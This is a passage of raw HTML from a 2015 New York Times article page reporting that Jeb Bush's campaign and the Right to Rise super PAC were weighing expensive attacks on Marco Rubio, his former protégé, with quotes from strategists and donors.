Bush and his allies are privately threatening attacks that will try to undercut Mr. Rubio as unaccomplished and unprepared." data-publish-date="November 9, 2015" > <a class="visually-hidden skip-to-text-link" href="#story-continues-1">Continue reading the main story</a> <span class="sharetools-label visually-hidden">Share This Page</span> <div class="ad sharetools-inline-article-ad hidden nocontent robots-nocontent"> <a class="visually-hidden skip-to-text-link" href="#story-continues-1">Continue reading the main story</a> </div> <div id="MiddleLeft" class="ad middle-left-ad hidden nocontent robots-nocontent"> <a class="visually-hidden skip-to-text-link" href="#story-continues-1">Continue reading the main story</a> </div> </div><!-- close shareTools --> </div> <p class="story-body-text story-content" data-para-count="191" data-total-count="191" itemprop="articleBody" id="story-continues-1">The cash-rich group aiding <a href="http://www.nytimes.com/interactive/2015/06/15/us/elections/jeb-bush.html?inline=nyt-per" title="More articles about Jeb Bush." class="meta-per">Jeb Bush</a>’s White House run has filmed a provocative video casting his rival <a href="http://www.nytimes.com/interactive/2015/04/14/us/elections/marco-rubio.html?inline=nyt-per" title="More articles about Marco Rubio." class="meta-per">Marco Rubio</a> as ultimately unelectable because of his hard-line stand against abortion.</p><aside id='middle-right-paid-post-container' class='ad middle-right-ad paid-post-ad hidden nocontent robots-nocontent'> <h2 class='marginalia-heading'></h2> <ul class='story-menu'> <li id='MiddleRightPaidPost1' class='story-menu-item ad'></li> <li id='MiddleRightPaidPost2' class='story-menu-item ad'></li> <li id='MiddleRightPaidPost3' class='story-menu-item ad'></li> <li id='MiddleRightPaidPost4' class='story-menu-item ad'></li> </ul> </aside><p class="story-body-text story-content" data-para-count="160" data-total-count="351" itemprop="articleBody" id="story-continues-2">That group, which has raised more than $100 million, has asked voters in New Hampshire how they feel about Mr. Rubio’s skipping important votes in the Senate.</p><p class="story-body-text story-content" data-para-count="218" data-total-count="569" itemprop="articleBody">And the group’s chief strategist has boasted of his willingness to spend as much as $20 million to damage Mr. Rubio’s reputation and halt his sudden ascent in the polls, according to three people told of the claim.</p><p class="story-body-text story-content" data-para-count="307" data-total-count="876" itemprop="articleBody">Seething with anger and alarmed over Mr. Rubio’s rise, aides to Mr. Bush, the former Florida governor, and his allies are privately threatening a wave of scathing attacks on his former protégé in the coming weeks, in a sign of just how anxious they have become about the state of Mr. Bush’s candidacy.</p> <aside class="marginalia related-coverage-marginalia nocontent robots-nocontent" data-marginalia-type="sprinkled" role="complementary" module="RelatedCoverage-Marginalia"> <div class="nocontent robots-nocontent"> <a class="visually-hidden skip-to-text-link" href="#story-continues-3">Continue reading the main story</a> <header> <h2 class="module-heading"> Related Coverage </h2> </header> <ul> <li><article class="story theme-summary"> <a class="story-link" href="http://www.nytimes.com/2015/10/31/us/politics/paul-singer-influential-billionaire-throws-support-to-marco-rubio-for-president.html"> <div class="thumb"> <img src="http://static01.nyt.com/images/2015/10/31/us/31RUBIOweb/31RUBIOweb-thumbStandard-v2.jpg" alt="Paul Singer in Las Vegas in 2012. A billionaire, he gives money to Republican candidates and causes, often to up-and-coming candidates." /> <div class="media-action-overlay"></div> </div> <h2 class="story-heading"> <span class="story-heading-text">Paul Singer, Influential Billionaire, Throws Support to Marco Rubio for President</span><time class="dateline" datetime="2015-10-30">OCT. 30, 2015</time> </h2> </a> </article> </li> <li><article class="story theme-summary"> <a class="story-link" href="http://www.nytimes.com/2015/10/30/us/politics/jeb-bush-marco-rubio-presidential-race.html"> <div class="thumb"> <img src="http://static01.nyt.com/images/2015/10/30/us/30REPUBS1/30REPUBS1-thumbStandard.jpg" alt="Senator Marco Rubio of Florida during closing remarks at Wednesday’s presidential debate in Colorado." /> <div class="media-action-overlay"></div> </div> <h2 class="story-heading"> <span class="story-heading-text">Past Partners, Marco Rubio and Jeb Bush Shift Directions</span><time class="dateline" datetime="2015-10-29">OCT. 29, 2015</time> </h2> </a> </article> </li> <li><article class="story theme-summary"> <a class="story-link" href="http://www.nytimes.com/2015/10/29/us/politics/polite-interruption-reveals-how-friendships-fray-on-the-campaign-trail.html"> <div class="thumb"> <img src="http://static01.nyt.com/images/2015/10/29/us/29assess/29assess-thumbStandard-v2.jpg" alt="Former Gov. Jeb Bush, left, and Senator Marco Rubio sparred on Wednesday over Mr. Rubio’s voting record in the Senate." /> <div class="media-action-overlay"></div> </div> <h2 class="story-heading"> <span class="story-heading-text">The Disciple Strikes Back: Rubio Bests Bush in a Key Moment</span><time class="dateline" datetime="2015-10-28">OCT. 28, 2015</time> </h2> </a> </article> </li> <li><article class="story theme-summary"> <a class="story-link" href="http://www.nytimes.com/2015/04/10/us/politics/expected-presidential-bid-puts-marco-rubio-at-odds-with-a-mentor-jeb-bush.html"> <div class="thumb"> <img src="http://static01.nyt.com/images/2015/04/07/us/politics/10rubiojeb-web/07JEB-RUBIO-web-thumbStandard.jpg" alt="Marco Rubio, center, greeted Jeb Bush, then governor, in 2006 on his way to being sworn in as speaker of the Florida House." /> <div class="media-action-overlay"></div> </div> <h2 class="story-heading"> <span class="story-heading-text">2016 Ambitions Turn Marco Rubio, Jeb Bush Protégé, Into Rival </span><time class="dateline" datetime="2015-04-09">APRIL 9, 2015</time> </h2> </a> </article> </li> </ul> </div><!-- close nocontent --> </aside> <p class="story-body-text story-content" data-para-count="225" data-total-count="1101" itemprop="articleBody" id="story-continues-3">Their looming problem: In trying to undercut Mr. Rubio as unaccomplished and unprepared, Mr. Bush is a flawed messenger. Over the years he has repeatedly, and sometimes lavishly, praised the younger lawmaker, often on camera.</p><figure id="media-100000004027791" class="media photo embedded has-adjacency has-lede-adjacency layout-large-horizontal media-100000004027791 ratio-tall" data-media-action="modal" itemprop="associatedMedia" itemscope itemid="http://static01.nyt.com/images/2015/11/10/us/10-BUSHRUBIO2/10-BUSHRUBIO2-articleLarge.jpg" itemtype="http://schema.org/ImageObject" aria-label="media" role="group"> <span class="visually-hidden">Photo</span> <div class="image"> <img src="http://static01.nyt.com/images/2015/11/10/us/10-BUSHRUBIO2/10-BUSHRUBIO2-articleLarge.jpg" alt="" class="media-viewer-candidate" data-mediaviewer-src="http://static01.nyt.com/images/2015/11/10/us/10-BUSHRUBIO2/10-BUSHRUBIO2-superJumbo.jpg" data-mediaviewer-caption="Senator Marco Rubio of Florida at Rivier University in Nashua, N.H., on Wednesday." data-mediaviewer-credit="Ian Thomas Jansen-Lonnquist for The New York Times" itemprop="url" itemid="http://static01.nyt.com/images/2015/11/10/us/10-BUSHRUBIO2/10-BUSHRUBIO2-articleLarge.jpg"/> <meta itemprop="height" content="400" /> <meta itemprop="width" content="600" /> </div> <figcaption class="caption" itemprop="caption description"> <span class="caption-text">Senator Marco Rubio of Florida at Rivier University in Nashua, N.H., on Wednesday.</span> <span class="credit" itemprop="copyrightHolder"> <span class="visually-hidden">Credit</span> Ian Thomas Jansen-Lonnquist for The New York Times </span> </figcaption> </figure> <p class="story-body-text story-content" data-para-count="169" data-total-count="1270" itemprop="articleBody">In one of many such tributes, Mr. Bush <a title="Charlie Rose interview with Jeb Bush" href="https://youtu.be/P3SG7obQ_Z0?t=1m30s">declared</a> in a 2012 television interview that Mr. Rubio had “the intellectual acumen and the fortitude to be a good president.”</p><p class="story-body-text story-content" data-para-count="255" data-total-count="1525" itemprop="articleBody">Whether or not the onslaught ever materializes, Mr. Rubio and his team are bracing for it and preparing to counter it by sifting through hours of video footage for instances in which Mr. Bush spoke about Mr. Rubio as an admiring ally, not a political foe.</p><p class="story-body-text story-content" data-para-count="339" data-total-count="1864" itemprop="articleBody">They are also telegraphing a warning that has already reached many of Mr. Bush’s donors: Such an assault, they argue, would be beneath the dignity of the Bush name. And Mr. Bush should focus on resurrecting his own candidacy, they say, not on trying to tear down Mr. Rubio, who they contend represents the future of the <a href="http://topics.nytimes.com/top/reference/timestopics/organizations/r/republican_party/index.html?inline=nyt-org" title="More articles about Republican Party" class="meta-org">Republican Party</a>.</p><p class="story-body-text story-content" data-para-count="287" data-total-count="2151" itemprop="articleBody">Some Bush donors, campaign aides and Republican operatives are cautioning Mr. Bush and his staff about the dangers of seeking to wound Mr. Rubio, whose career he assiduously nurtured for years when Mr. Bush was governor and Mr. Rubio was a member of the Florida House of Representatives.</p><div id="Moses" class="ad moses-ad nocontent robots-nocontent"><div class="accessibility-ad-header visually-hidden"> <p>Advertisement</p> </div> <a class="visually-hidden skip-to-text-link" href="#story-continues-4">Continue reading the main story</a> </div><p class="story-body-text story-content" data-para-count="165" data-total-count="2316" itemprop="articleBody" id="story-continues-4">“Given their closeness while governing, I find the whole thing baffling,” said Stuart Stevens, a Republican strategist who oversaw Mitt Romney’s 2012 campaign.</p><p class="story-body-text story-content" data-para-count="102" data-total-count="2418" itemprop="articleBody">“I seem not to be alone,” Mr. Stevens added. “I don’t see any evidence that it’s working.”</p><p class="story-body-text story-content" data-para-count="263" data-total-count="2681" itemprop="articleBody">Some supporters of Mr. Bush are publicly urging restraint. “At the end of the day, wisdom dictates that an internecine fight between the two is unnecessary, and potentially damaging to both,” said Anthony Scaramucci, a New York financier and Bush fund-raiser.</p> <figure id="presidential-candidates-dashboard" class="interactive promo has-adjacency layout-small"> <a class="visually-hidden skip-to-text-link" href="#story-continues-5">Continue reading the main story</a> <a href="http://www.nytimes.com/interactive/2016/us/elections/presidential-candidates-dashboard.html"> <div class="interactive-image-container"> <div class="interactive-image"> <img src="http://static01.nyt.com/images/2015/09/16/us/elections/presidential-candidates-dashboard-1442376909418/presidential-candidates-dashboard-1442376909418-master180-v5.png" /> </div> <div class="interactive-overlay"> <i class="icon sprite-icon interactive-overlay-icon"></i> <span class="interactive-overlay-text"> OPEN Interactive Graphic </span> </div> </div> <h2 class="interactive-headline"> Interactive Graphic: Who’s Winning the Presidential Campaign? </h2> </a> </figure> <p class="story-body-text story-content" data-para-count="249" data-total-count="2930" itemprop="articleBody" id="story-continues-5">Mr. Rubio’s campaign sees a potential benefit: Attacks by Mr. Bush and his allies could engender sympathy for Mr. Rubio, as occurred when Charlie Crist, his Republican rival in the 2010 Senate primary, was perceived as overly hostile to Mr. Rubio.</p><p class="story-body-text story-content" data-para-count="203" data-total-count="3133" itemprop="articleBody" id="story-continues-6">Those involved in the Bush camp’s discussions about whether to assail Mr. Rubio said that no firm plan or timeline was in place and that their focus could shift to different rivals in the coming weeks.</p><div id="MiddleRight1" class="ad ad-placeholder nocontent robots-nocontent"><div class="accessibility-ad-header visually-hidden"> <p>Advertisement</p> </div> <a class="visually-hidden skip-to-text-link" href="#story-continues-7">Continue reading the main story</a> </div> <div id="MiddleRightN" class="ad text-ad middle-right-ad nocontent robots-nocontent"><div class="accessibility-ad-header visually-hidden"> <p>Advertisement</p> </div> <a class="visually-hidden skip-to-text-link" href="#story-continues-7">Continue reading the main story</a> </div><p class="story-body-text story-content" data-para-count="318" data-total-count="3451" itemprop="articleBody" id="story-continues-7">But the preoccupation with Mr. Rubio is revealing, suggesting not just fury at his challenge to a former mentor, but also a conviction that rivals like Donald J. Trump and Ben Carson have no chance of winning and will collapse in time for Mr. Bush to rise again. Mr. Rubio, the Bush team expects, will remain standing.</p><p class="story-body-text story-content" data-para-count="286" data-total-count="3737" itemprop="articleBody">For many of Mr. Bush’s longest-serving advisers, Mr. Rubio’s run is a betrayal: Mr. Bush backed Mr. Rubio’s bid for House speaker in Florida and persuaded important donors to endorse him for the Senate. A few of Mr. Bush’s supporters have taken to calling Mr. Rubio “Judas.”</p><p class="story-body-text story-content" data-para-count="154" data-total-count="3891" itemprop="articleBody">In meetings with donors and allies, Mr. Bush’s top aides have pointed to what they describe as a trove of research on Mr. Rubio that they could unleash.</p><p class="story-body-text story-content" data-para-count="256" data-total-count="4147" itemprop="articleBody">Any attacks on Mr. Rubio would come primarily from Right to Rise, the “<a title="More articles about Super PACs." href="http://topics.nytimes.com/top/reference/timestopics/subjects/c/campaign_finance/index.html?inline=nyt-classifier">super PAC</a>” that has raised more than $100 million for Mr. Bush. Its top strategist, Mike Murphy, refused to detail its strategy but did not dispute that Mr. Rubio was in its sights.</p><p class="story-body-text story-content" data-para-count="191" data-total-count="4338" itemprop="articleBody" id="story-continues-8">“Part of running for president is you have to put your big boy pants on and get vetted on the issues, so we know we don’t have a dud candidate running against Hillary Clinton,” he said.</p><figure id="1click-FD" class="interactive interactive-embedded has-adjacency limit-small layout-small"> <a class="visually-hidden skip-to-text-link" href="#story-continues-9">Continue reading the main story</a> <figcaption class="interactive-caption"> </figcaption> <div class="interactive-graphic"> <!-- ====================================================== THIS IS A GENERATED TEMPLATE FILE. DO NOT EDIT. ====================================================== --> <!-- this file is generated from src/style.css --> <link rel="stylesheet" type="text/css" href="http://graphics8.nytimes.com/newsgraphics/2014/12/02/email-kirstof-embed/cbc36bdb86303cbcf8bdfea5a048ab3f44bf5ce1/build.css"> <div id="d-promo-realestate"> <h2 class="d-headline"><a href="http://www.nytimes.com/politics/first-draft/">First Draft</a> Newsletter</h2> <p class="d-leadin">Subscribe for updates on the <a href="http://www.nytimes.com/interactive/2016/us/elections/election-2016.html">2016 presidential race</a>, the White House and Congress, delivered to your inbox Monday - Friday.</p> <iframe title="regilite" src="https://regilite.nytimes.com/regilite?product=CN&theme=Transparent&landing=true&addSlot=true" scrolling="no" allowtransparency="true"></iframe> </div> <script> var NYTG_ASSETS = "http://graphics8.nytimes.com/newsgraphics/2014/12/02/email-kirstof-embed/cbc36bdb86303cbcf8bdfea5a048ab3f44bf5ce1/"; var NYTG_BIG_ASSETS = "http://graphics8.nytimes.com/newsgraphics/2014/12/02/email-kirstof-embed/assets/"; require(['foundation/main'], function() { // this file is generated from src/script.js require(["http://graphics8.nytimes.com/newsgraphics/2014/12/02/email-kirstof-embed/cbc36bdb86303cbcf8bdfea5a048ab3f44bf5ce1/build.js"]); }); </script> <script> var canonical = document.querySelector("link[rel='canonical']").href, pageview = ['_trackPageview']; if (canonical) { var a = document.createElement("a"); a.href = canonical; if (a.pathname != document.location.pathname) pageview.push(a.pathname); } _gaq = [['_setAccount', 'UA-9262032-1'], pageview]; </script> <script async src="http://www.google-analytics.com/ga.js"></script><!-- Pipeline: cbc36bdb86303cbcf8bdfea5a048ab3f44bf5ce1 --> </div> <div class="footer"> </div> </figure> <p class="story-body-text story-content" data-para-count="309" data-total-count="4647" itemprop="articleBody" id="story-continues-9">Asked about the multiple videos of Mr. Bush praising Mr. Rubio over the years, Mr. Murphy said of Mr. Rubio: “We all supported him for the Senate. We all support him staying there, because he is far from proving he is ready and experienced enough to be president of the United States in a dangerous time.”</p><p class="story-body-text story-content" data-para-count="274" data-total-count="4921" itemprop="articleBody">Mr. Murphy’s critique echoed an internal Bush campaign memo outlining Mr. Rubio’s vulnerabilities. Under the headline “Marco is a risky bet,” the memo, which surfaced on Oct. 29, said Mr. Rubio “has never been in charge of anything larger than two dozen people.”</p><p class="story-body-text story-content" data-para-count="180" data-total-count="5101" itemprop="articleBody">The preparatory work by Right to Rise was described by three people privy to it who insisted on anonymity to preserve their relationships with the group and with the Bush campaign.</p><p class="story-body-text story-content" data-para-count="427" data-total-count="5528" itemprop="articleBody">Right to Rise held focus groups in New Hampshire shortly after the Oct. 28 Republican debate, in which, among other things, the participants were quizzed about Mr. Rubio’s missed votes on two Republican priorities: cutting federal funding for Planned Parenthood, which carries out abortions, and <a href="http://www.cnn.com/2015/09/17/politics/iran-nuclear-deal-senate-block/">blocking</a> President Obama’s nuclear agreement with Iran. The responses suggested that both could provide potent lines of attack.</p><p class="story-body-text story-content" data-para-count="416" data-total-count="5944" itemprop="articleBody">In an attempt to blunt Mr. Rubio’s appeal and showcase a potential vulnerability against the Democratic nominee in the general election, Mr. Murphy recently showed some Republicans a video portraying Mr. Rubio as too extreme on abortion. A longtime opponent of abortion rights, Mr. Rubio said in a debate in August that he had “never advocated” laws that would allow abortions, even in cases of rape or incest.</p><p class="story-body-text story-content" data-para-count="243" data-total-count="6187" itemprop="articleBody">Mr. Murphy has privately said to several people that Right to Rise would be ready to devote up to $20 million to fighting Mr. Rubio, according to several people told of the conversations. Asked about the figure, Mr. Murphy declined to comment.</p><p class="story-body-text story-content" data-para-count="383" data-total-count="6570" itemprop="articleBody">Aides to Mr. Bush, meanwhile, have grown weary of conflicting advice about how to deal with Mr. Rubio. After the Oct. 28 debate, in which Mr. Bush criticized Mr. Rubio for missing votes, Mr. Bush’s top adviser, Sally Bradshaw, archly noted on a conference call that the very donors accusing Mr. Bush of being too aggressive had previously encouraged Mr. Bush to go after Mr. Rubio.</p><p class="story-body-text story-content" data-para-count="63" data-total-count="6633" itemprop="articleBody">Many of Mr. Bush’s supporters are eager for political combat.</p><p class="story-body-text story-content" data-para-count="216" data-total-count="6849" itemprop="articleBody">“I think it’s fair game to point out Marco’s record, or lack thereof,” said Joseph M. Kyrillos Jr., a Republican state senator in New Jersey who is raising money for Mr. Bush. “It’s not below the belt.”</p> <footer class="story-footer story-content"> <div class="story-meta"> <div class="story-notes"><p>Jonathan Martin contributed reporting.</p></div> <div class="story-info"><p><em>Find out what you need to know about the <a href="http://www.nytimes.com/interactive/2016/us/elections/election-2016.html">2016 presidential race</a> today, and get politics news updates via <a href="https://www.facebook.com/nytpolitics">Facebook</a>, <a href="https://twitter.com/nytpolitics">Twitter</a> and <a href="http://www.nytimes.com/newsletters/politics">the First Draft newsletter</a>.</em></p></div> <p class="story-print-citation">A version of this article appears in print on November 10, 2015, on page A14 of the <span itemprop="printEdition">New York edition</span> with the headline: Bush Allies Threaten Wave of Harsh Attacks on Rubio, an Ex-Protégé. <span class="story-footer-links"> <span><a href="https://s100.copyright.com/AppDispatchServlet?contentID=http%3A%2F%2Fwww.nytimes.com%2F2015%2F11%2F10%2Fus%2Fpolitics%2Fbush-allies-threaten-wave-of-harsh-attacks-on-rubio-an-ex-mentee.html&publisherName=The+New+York+Times&publication=nytimes.com&token=&orderBeanReset=true&postType=&wordCount=1152&title=Bush+Allies+Threaten+Wave+of+Harsh+Attacks+on+Rubio%2C+an+Ex-Mentee&publicationDate=November+9%2C+2015&author=By Maggie Haberman and Michael Barbaro" target="_blank">Order Reprints</a><span class="pipe">|</span></span> <span><a href="http://www.nytimes.com/pages/todayspaper/index.html" target="_blank">Today's Paper</a><span class="pipe">|</span></span><span><a href="http://www.nytimes.com/subscriptions/Multiproduct/lp839RF.html?campaignId=48JQY" target="_blank">Subscribe</a></span> </span> </p> </div><!-- close story-meta --> </footer> <nav id="next-in"></nav><!-- close next-in --> </div><!-- close story-body --> </article> <aside class="marginalia most-emailed-marginalia hidden nocontent robots-nocontent" data-truncate-enabled="true"></aside> <section id="whats-next" class="whats-next nocontent robots-nocontent"> <div class="nocontent robots-nocontent"> <div class="loader-container"> <div class="loader loader-t-logo-32x32-ecedeb-ffffff"><span class="visually-hidden">Loading...</span></div> </div> </div><!-- close nocontent --> </section> <div id="TopAd1" class="text-ad bottom-left-ad nocontent robots-nocontent"></div> <div id="Top5" class="ad top5-ad hidden nocontent robots-nocontent"></div> <div class="search-overlay"></div> </main><!-- close main --> <section id="site-index" class="site-index"> <header class="section-header"> <p class="user-action"><a href="http://www.nytimes.com/">Go to Home Page »</a></p> <h2 class="section-heading"> <span class="visually-hidden">Site Index</span> <a id="site-index-branding-link" href="http://www.nytimes.com/"> <span class="visually-hidden">The New York Times</span> </a> </h2> <script>window.magnum.writeLogo('small', 'http://a1.nyt.com/assets/article/20151106-152942/images/foundation/logos/', '', '', 'standard', 'site-index-branding-link');</script> </header> <nav id="site-index-navigation" class="site-index-navigation" role="navigation"> <div class="split-6-layout layout"> <div class="column"> <h3 class="menu-heading">News</h3> <ul class="menu"> <li> <a href="http://www.nytimes.com/pages/world/index.html">World</a> </li> <li> <a href="http://www.nytimes.com/pages/national/index.html">U.S.</a> </li> <li> <a href="http://www.nytimes.com/pages/politics/index.html">Politics</a> </li> <li> <a href="http://www.nytimes.com/pages/nyregion/index.html">N.Y.</a> </li> <li> <a href="http://www.nytimes.com/pages/business/index.html">Business</a> </li> <li> <a href="http://www.nytimes.com/pages/technology/index.html">Tech</a> </li> <li> <a href="http://www.nytimes.com/pages/science/index.html">Science</a> </li> <li> <a href="http://www.nytimes.com/pages/health/index.html">Health</a> </li> <li> <a href="http://www.nytimes.com/pages/sports/index.html">Sports</a> </li> <li> <a href="http://www.nytimes.com/pages/education/index.html">Education</a> </li> <li> <a href="http://www.nytimes.com/pages/obituaries/index.html">Obituaries</a> </li> <li> <a href="http://www.nytimes.com/pages/todayspaper/index.html">Today's Paper</a> </li> <li> <a href="http://www.nytimes.com/pages/corrections/index.html">Corrections</a> </li> </ul> </div><!-- close column --> <div class="column"> <h3 class="menu-heading">Opinion</h3> <ul class="menu"> <li> <a href="http://www.nytimes.com/pages/opinion/index.html">Today's Opinion</a> </li> <li> <a href="http://www.nytimes.com/pages/opinion/index.html#columnists">Op-Ed Columnists</a> </li> <li> <a href="http://www.nytimes.com/pages/opinion/index.html#editorials">Editorials</a> </li> <li> <a href="http://www.nytimes.com/pages/opinion/index.html#contributing">Contributing Writers</a> </li> <li> <a href="http://www.nytimes.com/pages/opinion/index.html#op-ed">Op-Ed Contributors</a> </li> <li> <a href="http://www.nytimes.com/pages/opinion/index.html#opinionator">Opinionator</a> </li> <li> <a href="http://www.nytimes.com/pages/opinion/index.html#letters">Letters</a> </li> <li> <a href="http://www.nytimes.com/pages/opinion/index.html#sundayreview">Sunday Review</a> </li> <li> <a href="http://www.nytimes.com/pages/opinion/index.html#takingNote">Taking Note</a> </li> <li> <a href="http://www.nytimes.com/roomfordebate">Room for Debate</a> </li> <li> <a href="http://topics.nytimes.com/top/opinion/thepubliceditor/index.html">Public Editor</a> </li> <li> <a href="http://www.nytimes.com/video/opinion">Video: Opinion</a> </li> </ul> </div><!-- close column --> <div class="column"> <h3 class="menu-heading">Arts</h3> <ul class="menu"> <li> <a href="http://www.nytimes.com/pages/arts/index.html">Today's Arts</a> </li> <li> <a href="http://www.nytimes.com/pages/arts/design/index.html">Art & Design</a> </li> <li> <a href="http://artsbeat.blogs.nytimes.com/">ArtsBeat</a> </li> <li> <a href="http://www.nytimes.com/pages/books/index.html">Books</a> </li> <li> <a href="http://www.nytimes.com/pages/arts/dance/index.html">Dance</a> </li> <li> <a href="http://www.nytimes.com/pages/movies/index.html">Movies</a> </li> <li> <a href="http://www.nytimes.com/pages/arts/music/index.html">Music</a> </li> <li> <a href="http://www.nytimes.com/events/">N.Y.C. Events Guide</a> </li> <li> <a href="http://www.nytimes.com/pages/arts/television/index.html">Television</a> </li> <li> <a href="http://www.nytimes.com/pages/theater/index.html">Theater</a> </li> <li> <a href="http://www.nytimes.com/pages/arts/video-games/index.html">Video Games</a> </li> <li> <a href="http://www.nytimes.com/video/arts">Video: Arts</a> </li> </ul> </div><!-- close column --> <div class="column"> <h3 class="menu-heading">Living</h3> <ul class="menu"> <li> <a href="http://www.nytimes.com/pages/automobiles/index.html">Automobiles</a> </li> <li> <a href="http://www.nytimes.com/crosswords/">Crossword</a> </li> <li> <a href="http://www.nytimes.com/pages/dining/index.html">Food</a> </li> <li> <a href="http://www.nytimes.com/pages/education/index.html">Education</a> </li> <li> <a href="http://www.nytimes.com/pages/fashion/index.html">Fashion & Style</a> </li> <li> <a href="http://www.nytimes.com/pages/health/index.html">Health</a> </li> <li> <a href="http://www.nytimes.com/section/jobs">Jobs</a> </li> <li> <a href="http://www.nytimes.com/pages/magazine/index.html">Magazine</a> </li> <li> <a href="http://www.nytimes.com/events/">N.Y.C. Events Guide</a> </li> <li> <a href="http://www.nytimes.com/pages/realestate/index.html">Real Estate</a> </li> <li> <a href="http://www.nytimes.com/section/t-magazine">T Magazine</a> </li> <li> <a href="http://www.nytimes.com/pages/travel/index.html">Travel</a> </li> <li> <a href="http://www.nytimes.com/pages/fashion/weddings/index.html">Weddings & Celebrations</a> </li> </ul> </div><!-- close column --> <div class="column"> <h3 class="menu-heading">Listings & More</h3> <ul class="menu"> <li> <a href="http://www.nytimes.com/ref/classifieds/">Classifieds</a> </li> <li> <a href="http://www.nytimes.com/marketing/tools-and-services/">Tools & Services</a> </li> <li> <a href="http://www.nytimes.com/pages/topics/">Times Topics</a> </li> <li> <a href="http://topics.nytimes.com/top/opinion/thepubliceditor/index.html">Public Editor</a> </li> <li> <a href="http://www.nytimes.com/events/">N.Y.C. Events Guide</a> </li> <li> <a href="http://tvlistings.nytimes.com/tvlistings/ZCGrid.do?aid=nyt">TV Listings</a> </li> <li> <a href="http://www.nytimes.com/interactive/blogs/directory.html">Blogs</a> </li> <li> <a href="http://www.nytimes.com/pages/multimedia/index.html">Multimedia</a> </li> <li> <a href="http://lens.blogs.nytimes.com/">Photography</a> </li> <li> <a href="http://www.nytimes.com/video">Video</a> </li> <li> <a href="https://www.nytimes.com/store/?&t=qry542&utm_source=nytimes&utm_medium=HPB&utm_content=hp_browsetree&utm_campaign=NYT-HP&module=SectionsNav&action=click®ion=TopBar&version=BrowseTree&contentCollection=NYT%20Store&contentPlacement=2&pgtype=Homepage">NYT Store</a> </li> <li> <a href="http://www.nytimes.com/times-journeys/?utm_source=nytimes&utm_medium=HPLink&utm_content=hp_browsetree&utm_campaign=NYT-HP">Times Journeys</a> </li> <li> <a href="http://www.nytimes.com/seeallnav">Subscribe</a> </li> <li> <a href="http://www.nytimes.com/membercenter">Manage My Account</a> </li> </ul> </div><!-- close column --> <div class="column last-column"> <h3 class="menu-heading">Subscribe</h3> <ul class="menu primary-menu"> <li class="menu-label">Subscribe</li> <li class="times-premier"> <i class="icon sprite-icon"></i> <a href="http://www.nytimes.com/tpnav">Times Insider</a> </li> <li class="home-delivery"> <i class="icon sprite-icon"></i> <a href="http://www.nytimes.com/hdleftnav">Home Delivery</a> </li> <li class="digital-subscriptions"> <i class="icon sprite-icon"></i> <a href="http://www.nytimes.com/digitalleftnav">Digital Subscriptions</a> </li> <li class="nyt-opinion"> <i class="icon sprite-icon"></i> <a href="http://www.nytimes.com/opinionindex">NYT Opinion</a> </li> <li class="nyt-crossword last-item"> <i class="icon sprite-icon"></i> <a id="nyt-crossword" href="http://www.nytimes.com/crosswords/index.html">Crossword</a> </li> </ul> <ul class="menu secondary-menu"> <li> <a href="http://www.nytimes.com/marketing/newsletters">Email Newsletters</a> </li> <li> <a href="https://myaccount.nytimes.com/mem/tnt.html">Alerts</a> </li> <li> <a href="http://www.nytimes.com/giftleftnav">Gift Subscriptions</a> </li> <li> <a href="http://www.nytimes.com/corporateleftnav">Corporate Subscriptions</a> </li> <li> <a href="http://www.nytimes.com/educationleftnav">Education Rate</a> </li> </ul> <ul class="menu secondary-menu"> <li> <a href="http://www.nytimes.com/services/mobile/index.html">Mobile Applications</a> </li> <li> <a href="http://eedition.nytimes.com/cgi-bin/signup.cgi?cc=37FYY">Replica Edition</a> </li> <li> <a href="http://subscribe.inyt.com">International New York Times</a> </li> </ul> </div><!-- close column --> </div><!-- close split-6-layout --> </nav><!-- close nav --> </section><!-- close site-index --> <footer id="page-footer" class="page-footer" role="contentinfo"> <nav> <ul> <li> <a href="http://www.nytimes.com/content/help/rights/copyright/copyright-notice.html" itemprop="copyrightNotice"> © <span itemprop="copyrightYear">2015</span><span itemprop="copyrightHolder provider sourceOrganization" itemscope itemtype="http://schema.org/Organization" itemid="http://www.nytimes.com"><span itemprop="name"> The New York Times Company</span><meta itemprop="tickerSymbol" content="NYSE NYT"/></span> </a> </li> <li class="visually-hidden"><a href="http://www.nytimes.com">Home</a></li> <li class="visually-hidden"><a href="http://query.nytimes.com/search/sitesearch/#/">Search</a></li> <li class="visually-hidden">Accessibility concerns? Email us at <a href="mailto:accessibility@nytimes.com">accessibility@nytimes.com</a>. We would love to hear from you.</li> <li class="wide-viewport-item"><a href="http://www.nytimes.com/ref/membercenter/help/infoservdirectory.html">Contact Us</a></li> <li class="wide-viewport-item"><a href="http://www.nytco.com/careers">Work With Us</a></li> <li class="wide-viewport-item"><a href="http://www.nytimes.whsites.net/mediakit">Advertise</a></li> <li class="wide-viewport-item"><a href="http://www.nytimes.com/content/help/rights/privacy/policy/privacy-policy.html#pp">Your Ad Choices</a></li> <li><a href="http://www.nytimes.com/privacy">Privacy</a></li> <li><a href="http://www.nytimes.com/ref/membercenter/help/agree.html" itemprop="usageTerms">Terms of Service</a></li> <li class="wide-viewport-item last-item"><a href="http://www.nytimes.com/content/help/rights/sale/terms-of-sale.html">Terms of Sale</a></li> </ul> </nav> <nav class="last-nav"> <ul> <li><a href="http://spiderbites.nytimes.com">Site Map</a></li> <li><a href="http://www.nytimes.com/membercenter/sitehelp.html">Help</a></li> <li><a href="https://myaccount.nytimes.com/membercenter/feedback.html">Site Feedback</a></li> <li class="wide-viewport-item last-item"><a href="http://www.nytimes.com/subscriptions/Multiproduct/lp5558.html?campaignId=37WXW">Subscriptions</a></li> </ul> </nav> </footer> </div><!-- close page --> </div><!-- close shell --> <script> require(['foundation/main'], function () { require(['article/main']); require(['jquery/nyt', 'foundation/views/page-manager'], function ($, pageManager) { if (window.location.search.indexOf('disable_tagx') > 0) { return; } $(document).ready(function () { require(['http://static01.nyt.com/bi/js/tagx/tagx.js'], function () { pageManager.trackingFireEventQueue(); }); }); }); }); </script> <div id="Inv1" class="ad inv1-ad hidden"></div> <div id="Inv2" class="ad inv2-ad hidden"></div> <div id="Inv3" class="ad inv3-ad hidden"></div> <div id="ab1" class="ad ab1-ad hidden"></div> <div id="ab2" class="ad ab2-ad hidden"></div> <div id="ab3" class="ad ab3-ad hidden"></div> <div id="prop1" class="ad prop1-ad hidden"></div> <div id="prop2" class="ad prop2-ad hidden"></div> <div id="Anchor" class="ad anchor-ad hidden"></div> <div id="ADX_CLIENTSIDE" class="ad adx-clientside-ad hidden"></div> <script 